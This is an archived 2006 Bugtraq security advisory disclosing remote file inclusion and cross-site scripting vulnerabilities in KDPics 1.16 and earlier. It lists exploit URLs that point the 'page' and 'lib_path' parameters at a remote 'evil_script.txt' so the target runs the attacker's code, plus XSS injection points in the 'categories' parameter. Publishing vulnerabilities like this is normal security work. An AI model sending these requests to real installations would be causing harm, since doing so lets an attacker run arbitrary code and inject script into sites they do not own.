lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20061209084503.26524.qmail@securityfocus.com> Date: 9 Dec 2006 08:45:03 -0000 From: mr_kaliman@....com To: bugtraq@...urityfocus.com Subject: KDPics Multiple Vulnerabities KDPics 1.16 and prior -------------------- Vendor site: http://www.kdland.org/kdpics/ Product: KDPics <= 1.16 Vulnerability: Remote File Inclusion Vulnerability & XSS Credits: Mr_KaLiMaN Reported to Vendor: 30.11.06 Public disclosure: 09.12.06 Description: ------------ Remote File Inclusion Vulnerability: http://[victim]/[kdpics_path]/index.php3?page=http://evil_script.txt? http://[victim]/[kdpics_path]/authenticate.inc.php3?lib_path=http://evil_script.txt? http://[victim]/[kdpics_path]/lib/exifer/exif.php?lib_path=http://evil_script.txt? XSS: http://[victim]/[kdpics_path]/index.php3?page=galeries&categories=[XSS] http://[victim]/[kdpics_path]/galeries.inc.php3?categories=[XSS]